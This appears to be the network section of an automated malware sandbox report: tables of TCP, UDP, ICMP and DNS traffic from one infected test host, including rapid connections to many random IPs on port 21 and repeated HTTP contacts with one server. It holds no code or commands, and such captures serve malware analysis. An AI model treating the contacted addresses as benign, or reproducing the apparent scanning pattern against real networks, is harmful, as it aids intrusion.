Apr 14, 2021 04:49:42.305037975 CEST	49742	21	192.168.2.3	46.76.75.38
Apr 14, 2021 04:49:42.305042982 CEST	49738	21	192.168.2.3	218.96.42.181
Apr 14, 2021 04:49:42.305049896 CEST	49734	21	192.168.2.3	73.1.14.7
Apr 14, 2021 04:49:42.305048943 CEST	49727	21	192.168.2.3	171.177.72.44
Apr 14, 2021 04:49:42.305069923 CEST	49735	21	192.168.2.3	12.106.190.66
Apr 14, 2021 04:49:42.305087090 CEST	49739	21	192.168.2.3	130.225.23.51
Apr 14, 2021 04:49:42.336265087 CEST	49726	21	192.168.2.3	171.230.248.102
Apr 14, 2021 04:49:42.336303949 CEST	49740	21	192.168.2.3	67.58.234.31
Apr 14, 2021 04:49:42.336307049 CEST	49743	21	192.168.2.3	155.130.203.173
Apr 14, 2021 04:49:42.336323023 CEST	49741	21	192.168.2.3	131.75.79.149
Apr 14, 2021 04:49:42.336323977 CEST	49728	21	192.168.2.3	85.160.162.223
Apr 14, 2021 04:49:42.336342096 CEST	49731	21	192.168.2.3	219.170.142.236
Apr 14, 2021 04:49:42.336347103 CEST	49736	21	192.168.2.3	198.61.197.74
Apr 14, 2021 04:49:42.336354017 CEST	49730	21	192.168.2.3	90.125.237.45
Apr 14, 2021 04:49:42.336358070 CEST	49729	21	192.168.2.3	19.241.222.80
Apr 14, 2021 04:49:42.336395025 CEST	49732	21	192.168.2.3	121.206.203.45
Apr 14, 2021 04:49:42.414349079 CEST	49745	21	192.168.2.3	45.5.247.37
Apr 14, 2021 04:49:42.445626020 CEST	49746	21	192.168.2.3	86.62.15.78
Apr 14, 2021 04:49:42.445671082 CEST	49744	21	192.168.2.3	220.84.242.201
Apr 14, 2021 04:49:42.617512941 CEST	49750	21	192.168.2.3	185.29.165.99
Apr 14, 2021 04:49:42.617542982 CEST	49760	21	192.168.2.3	116.43.105.72
Apr 14, 2021 04:49:42.617567062 CEST	49751	21	192.168.2.3	104.104.124.171
Apr 14, 2021 04:49:42.617568970 CEST	49763	21	192.168.2.3	210.220.207.9
Apr 14, 2021 04:49:42.617578030 CEST	49762	21	192.168.2.3	157.228.18.187
Apr 14, 2021 04:49:42.617589951 CEST	49747	21	192.168.2.3	171.166.62.66
Apr 14, 2021 04:49:42.617613077 CEST	49753	21	192.168.2.3	3.108.243.58
Apr 14, 2021 04:49:42.617620945 CEST	49749	21	192.168.2.3	179.128.98.73
Apr 14, 2021 04:49:42.617624044 CEST	49761	21	192.168.2.3	130.142.102.100
Apr 14, 2021 04:49:42.617644072 CEST	49757	21	192.168.2.3	89.239.143.118
Apr 14, 2021 04:49:42.617664099 CEST	49755	21	192.168.2.3	34.242.168.15
Apr 14, 2021 04:49:42.625866890 CEST	49756	21	192.168.2.3	109.254.18.193
Apr 14, 2021 04:49:42.625953913 CEST	49758	21	192.168.2.3	41.35.35.143
Apr 14, 2021 04:49:42.742583036 CEST	49765	21	192.168.2.3	99.236.23.224
Apr 14, 2021 04:49:42.743951082 CEST	49766	21	192.168.2.3	64.116.62.52
Apr 14, 2021 04:49:42.744093895 CEST	49767	21	192.168.2.3	171.117.176.171
Apr 14, 2021 04:49:42.805072069 CEST	49764	21	192.168.2.3	44.72.12.182
Apr 14, 2021 04:49:42.805543900 CEST	49769	21	192.168.2.3	41.159.74.41
Apr 14, 2021 04:49:42.805545092 CEST	49768	21	192.168.2.3	216.28.55.232
Apr 14, 2021 04:49:42.914480925 CEST	49776	21	192.168.2.3	147.14.213.133
Apr 14, 2021 04:49:42.914491892 CEST	49777	21	192.168.2.3	90.242.155.36
Apr 14, 2021 04:49:42.914526939 CEST	49778	21	192.168.2.3	104.86.148.28
Apr 14, 2021 04:49:42.914541960 CEST	49780	21	192.168.2.3	25.183.69.138
Apr 14, 2021 04:49:42.914571047 CEST	49779	21	192.168.2.3	153.176.174.168
Apr 14, 2021 04:49:42.945667028 CEST	49770	21	192.168.2.3	40.52.92.245
Apr 14, 2021 04:49:42.945676088 CEST	49771	21	192.168.2.3	144.46.165.116
Apr 14, 2021 04:49:42.945678949 CEST	49783	21	192.168.2.3	129.116.232.201
Apr 14, 2021 04:49:42.945842028 CEST	49772	21	192.168.2.3	91.55.235.46
Apr 14, 2021 04:49:43.117571115 CEST	49787	21	192.168.2.3	208.96.174.244
Apr 14, 2021 04:49:43.117588997 CEST	49785	21	192.168.2.3	105.179.204.191
Apr 14, 2021 04:49:43.117598057 CEST	49790	21	192.168.2.3	122.26.216.107
Apr 14, 2021 04:49:43.117597103 CEST	49788	21	192.168.2.3	207.130.230.190
Apr 14, 2021 04:49:43.117626905 CEST	49789	21	192.168.2.3	41.203.78.215
Apr 14, 2021 04:49:43.117691040 CEST	49792	21	192.168.2.3	65.254.158.12
Apr 14, 2021 04:49:43.117690086 CEST	49781	21	192.168.2.3	128.166.71.75
Apr 14, 2021 04:49:43.148857117 CEST	49784	21	192.168.2.3	24.49.188.7
Apr 14, 2021 04:49:43.148978949 CEST	49791	21	192.168.2.3	169.106.68.226
Apr 14, 2021 04:49:43.149038076 CEST	49786	21	192.168.2.3	159.250.55.26
Apr 14, 2021 04:49:43.149040937 CEST	49795	21	192.168.2.3	121.60.39.136
Apr 14, 2021 04:49:43.305109978 CEST	49804	21	192.168.2.3	171.49.33.151
Apr 14, 2021 04:49:43.305135012 CEST	49800	21	192.168.2.3	117.44.26.168
Apr 14, 2021 04:49:43.305145025 CEST	49799	21	192.168.2.3	89.144.231.130
Apr 14, 2021 04:49:43.305166960 CEST	49802	21	192.168.2.3	144.116.50.234
Apr 14, 2021 04:49:43.305169106 CEST	49798	21	192.168.2.3	41.23.111.248
Apr 14, 2021 04:49:43.305255890 CEST	49805	21	192.168.2.3	55.142.1.120
Apr 14, 2021 04:49:43.336540937 CEST	49803	21	192.168.2.3	17.22.172.54
Apr 14, 2021 04:49:43.336580992 CEST	49796	21	192.168.2.3	112.134.97.100
Apr 14, 2021 04:49:43.414493084 CEST	49807	21	192.168.2.3	82.231.211.245
Apr 14, 2021 04:49:43.414524078 CEST	49808	21	192.168.2.3	103.247.141.163
Apr 14, 2021 04:49:43.414557934 CEST	49810	21	192.168.2.3	219.184.234.178
Apr 14, 2021 04:49:43.414565086 CEST	49806	21	192.168.2.3	103.246.251.106
Apr 14, 2021 04:49:43.445775986 CEST	49812	21	192.168.2.3	150.218.53.109
Apr 14, 2021 04:49:43.445852041 CEST	49809	21	192.168.2.3	96.72.172.148
Apr 14, 2021 04:49:43.607922077 CEST	49817	21	192.168.2.3	33.192.134.169
Apr 14, 2021 04:49:43.607961893 CEST	49814	21	192.168.2.3	149.207.134.197
Apr 14, 2021 04:49:43.607976913 CEST	49820	21	192.168.2.3	166.238.30.180
Apr 14, 2021 04:49:43.607991934 CEST	49819	21	192.168.2.3	153.14.101.251
Apr 14, 2021 04:49:43.617635012 CEST	49823	21	192.168.2.3	80.72.208.69
Apr 14, 2021 04:49:43.617649078 CEST	49822	21	192.168.2.3	194.72.18.27
Apr 14, 2021 04:49:43.617746115 CEST	49818	21	192.168.2.3	78.3.123.203
Apr 14, 2021 04:49:43.617768049 CEST	49813	21	192.168.2.3	104.73.134.124
Apr 14, 2021 04:49:43.742846966 CEST	49825	21	192.168.2.3	104.123.51.43
Apr 14, 2021 04:49:43.742851973 CEST	49824	21	192.168.2.3	125.233.60.227
Apr 14, 2021 04:49:46.114888906 CEST	49832	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:46.163289070 CEST	80	49832	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:46.163455963 CEST	49832	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:46.167551994 CEST	49832	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:46.216214895 CEST	80	49832	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:46.216258049 CEST	80	49832	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:46.403333902 CEST	49833	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:46.451893091 CEST	80	49833	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:46.452124119 CEST	49833	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:46.453080893 CEST	49833	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:46.501213074 CEST	80	49833	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:46.501319885 CEST	80	49833	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:47.571001053 CEST	49835	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:47.619661093 CEST	80	49835	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:47.619803905 CEST	49835	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:47.621979952 CEST	49835	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:47.670357943 CEST	80	49835	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:47.670399904 CEST	80	49835	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:47.685973883 CEST	49836	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:47.734577894 CEST	80	49836	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:47.734755039 CEST	49836	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:47.736999035 CEST	49836	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:47.785470963 CEST	80	49836	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:47.785511971 CEST	80	49836	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:49.561290026 CEST	49838	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:49.609895945 CEST	80	49838	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:49.610138893 CEST	49838	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:49.610702991 CEST	49838	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:49.659101009 CEST	80	49838	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:49.659142017 CEST	80	49838	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:49.674587965 CEST	49839	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:49.722692013 CEST	80	49839	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:49.722858906 CEST	49839	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:49.723225117 CEST	49839	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:49.771141052 CEST	80	49839	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:49.771220922 CEST	80	49839	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:50.295074940 CEST	49841	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:50.343337059 CEST	80	49841	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:50.343575001 CEST	49841	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:50.344017029 CEST	49841	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:50.395085096 CEST	80	49841	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:50.395111084 CEST	80	49841	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:50.410109997 CEST	49842	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:50.459799051 CEST	80	49842	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:50.459902048 CEST	49842	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:50.460474014 CEST	49842	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:50.512315035 CEST	80	49842	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:50.512339115 CEST	80	49842	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:50.930515051 CEST	49843	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:50.978929996 CEST	80	49843	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:50.979099035 CEST	49843	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:50.979654074 CEST	49843	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:51.027884007 CEST	80	49843	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:51.027929068 CEST	80	49843	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:51.043369055 CEST	49844	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:51.091700077 CEST	80	49844	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:51.091820002 CEST	49844	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:51.092395067 CEST	49844	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:51.140902996 CEST	80	49844	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:51.140947104 CEST	80	49844	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:51.703811884 CEST	49848	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:51.752147913 CEST	80	49848	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:51.752413988 CEST	49848	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:51.752847910 CEST	49848	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:51.801275015 CEST	80	49848	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:51.801295042 CEST	80	49848	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:51.815295935 CEST	49849	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:51.863729000 CEST	80	49849	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:51.864254951 CEST	49849	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:51.865423918 CEST	49849	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:51.913764000 CEST	80	49849	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:51.913816929 CEST	80	49849	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:52.468646049 CEST	49850	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:52.517838001 CEST	80	49850	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:52.517999887 CEST	49850	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:52.518357038 CEST	49850	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:52.566605091 CEST	80	49850	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:52.566627979 CEST	80	49850	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:52.580118895 CEST	49851	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:52.628433943 CEST	80	49851	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:52.628531933 CEST	49851	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:52.628918886 CEST	49851	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:52.677001953 CEST	80	49851	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:52.677133083 CEST	80	49851	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.111067057 CEST	49852	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.159590960 CEST	80	49852	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.159687042 CEST	49852	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.160115957 CEST	49852	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.208384991 CEST	80	49852	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.208427906 CEST	80	49852	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.221666098 CEST	49853	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.270143032 CEST	80	49853	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.270291090 CEST	49853	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.270828962 CEST	49853	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.319333076 CEST	80	49853	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.319370031 CEST	80	49853	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.778407097 CEST	49854	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.827028036 CEST	80	49854	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.829200029 CEST	49854	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.829547882 CEST	49854	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.877793074 CEST	80	49854	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.877829075 CEST	80	49854	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.905601978 CEST	49855	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.954210043 CEST	80	49855	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:53.954596996 CEST	49855	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:53.954993963 CEST	49855	80	192.168.2.3	37.1.216.8
Apr 14, 2021 04:49:54.003283024 CEST	80	49855	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:54.003624916 CEST	80	49855	37.1.216.8	192.168.2.3
Apr 14, 2021 04:49:54.591836929 CEST	49856	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:49:57.618766069 CEST	49856	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:50:03.619307995 CEST	49856	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:50:15.645404100 CEST	49961	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:50:18.651747942 CEST	49961	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:50:24.652249098 CEST	49961	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:50:37.251079082 CEST	50217	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:50:40.263719082 CEST	50217	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:50:46.279136896 CEST	50217	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:50:58.324410915 CEST	50320	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:51:01.327104092 CEST	50320	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:51:07.327966928 CEST	50320	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:51:19.884778023 CEST	50426	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:51:22.891417027 CEST	50426	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:51:28.891901016 CEST	50426	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:51:40.924551964 CEST	50630	80	192.168.2.3	1.2.3.1
Apr 14, 2021 04:51:43.924366951 CEST	50630	80	192.168.2.3	1.2.3.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 14, 2021 04:49:06.877645016 CEST	50620	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:06.934767962 CEST	53	50620	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:06.961738110 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:07.029958010 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:07.149101019 CEST	60152	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:07.197987080 CEST	53	60152	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:07.783916950 CEST	57544	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:07.841152906 CEST	53	57544	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:08.648741961 CEST	55984	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:08.697632074 CEST	53	55984	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:09.706304073 CEST	64185	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:09.758021116 CEST	53	64185	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:10.830717087 CEST	65110	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:10.879817009 CEST	53	65110	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:11.596293926 CEST	58361	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:11.645297050 CEST	53	58361	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:12.393119097 CEST	63492	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:12.442589998 CEST	53	63492	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:18.395251989 CEST	60831	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:18.452071905 CEST	53	60831	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:19.247349977 CEST	60100	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:19.299061060 CEST	53	60100	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:20.343154907 CEST	53195	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:20.391904116 CEST	53	53195	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:21.200551987 CEST	50141	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:21.252223969 CEST	53	50141	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:23.477893114 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:23.526784897 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:24.409899950 CEST	49563	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:24.461551905 CEST	53	49563	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:26.127162933 CEST	51352	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:26.178853989 CEST	53	51352	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:27.000627041 CEST	59349	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:27.049673080 CEST	53	59349	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:33.406887054 CEST	57084	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:33.455691099 CEST	53	57084	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:34.642271996 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:34.691148996 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:35.513791084 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:35.571003914 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:38.704687119 CEST	50540	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:38.820291042 CEST	53	50540	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:38.849431992 CEST	54366	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:38.961533070 CEST	53	54366	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:38.983221054 CEST	53034	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:39.043220043 CEST	53	53034	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:39.761156082 CEST	57762	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:39.821099043 CEST	53	57762	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:39.843197107 CEST	55435	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:39.900194883 CEST	53	55435	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:41.007811069 CEST	50713	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:41.065171003 CEST	53	50713	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:41.084233999 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:41.144356966 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:41.476305008 CEST	58987	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:41.541363001 CEST	53	58987	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:42.065689087 CEST	56579	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:42.128436089 CEST	53	56579	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:42.156963110 CEST	60633	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:42.215209007 CEST	53	60633	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:43.115184069 CEST	61292	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:43.175153971 CEST	53	61292	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:43.200656891 CEST	63619	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:43.257894039 CEST	53	63619	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:43.845107079 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:43.905314922 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:43.927969933 CEST	61946	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:43.985260010 CEST	53	61946	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:44.690237045 CEST	64910	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:44.747889042 CEST	53	64910	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:44.766356945 CEST	52123	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:44.823332071 CEST	53	52123	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:45.395641088 CEST	56130	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:45.453265905 CEST	53	56130	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:45.471251965 CEST	56338	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:45.528402090 CEST	53	56338	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:46.044492006 CEST	59420	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:46.101933002 CEST	53	59420	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:47.638031006 CEST	58784	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:47.697911024 CEST	53	58784	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:51.089226007 CEST	63978	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:51.137923956 CEST	53	63978	8.8.8.8	192.168.2.3
Apr 14, 2021 04:49:54.478739023 CEST	62938	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:49:54.590064049 CEST	53	62938	8.8.8.8	192.168.2.3
Apr 14, 2021 04:50:00.670115948 CEST	55708	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:50:00.728799105 CEST	53	55708	8.8.8.8	192.168.2.3
Apr 14, 2021 04:50:02.698394060 CEST	56803	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:50:02.768341064 CEST	53	56803	8.8.8.8	192.168.2.3
Apr 14, 2021 04:50:18.630940914 CEST	57145	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:50:18.699013948 CEST	53	57145	8.8.8.8	192.168.2.3
Apr 14, 2021 04:50:27.117819071 CEST	55359	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:50:27.178509951 CEST	53	55359	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:00.186825991 CEST	58306	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:00.245940924 CEST	53	58306	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:00.256383896 CEST	64124	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:00.313546896 CEST	53	64124	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:00.321225882 CEST	49361	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:00.369899988 CEST	53	49361	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:00.663043976 CEST	63150	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:00.711785078 CEST	53	63150	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:01.524987936 CEST	53279	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:01.593013048 CEST	53	53279	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:08.608135939 CEST	56881	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:08.665730953 CEST	53	56881	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:08.683676958 CEST	53642	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:08.790730000 CEST	53	53642	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:08.801322937 CEST	55667	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:08.849862099 CEST	53	55667	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:17.978888988 CEST	54833	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:18.086589098 CEST	53	54833	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:18.096754074 CEST	62476	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:18.154118061 CEST	53	62476	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:18.163649082 CEST	49705	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:18.221260071 CEST	53	49705	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:26.284368038 CEST	61477	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:26.341679096 CEST	53	61477	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:26.368341923 CEST	61633	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:26.426058054 CEST	53	61633	8.8.8.8	192.168.2.3
Apr 14, 2021 04:51:26.441515923 CEST	55949	53	192.168.2.3	8.8.8.8
Apr 14, 2021 04:51:26.498776913 CEST	53	55949	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 14, 2021 04:49:39.866066933 CEST	91.55.235.46	192.168.2.3	c527	(Unknown)	Destination Unreachable
Apr 14, 2021 04:49:42.999398947 CEST	91.55.235.46	192.168.2.3	c527	(Unknown)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
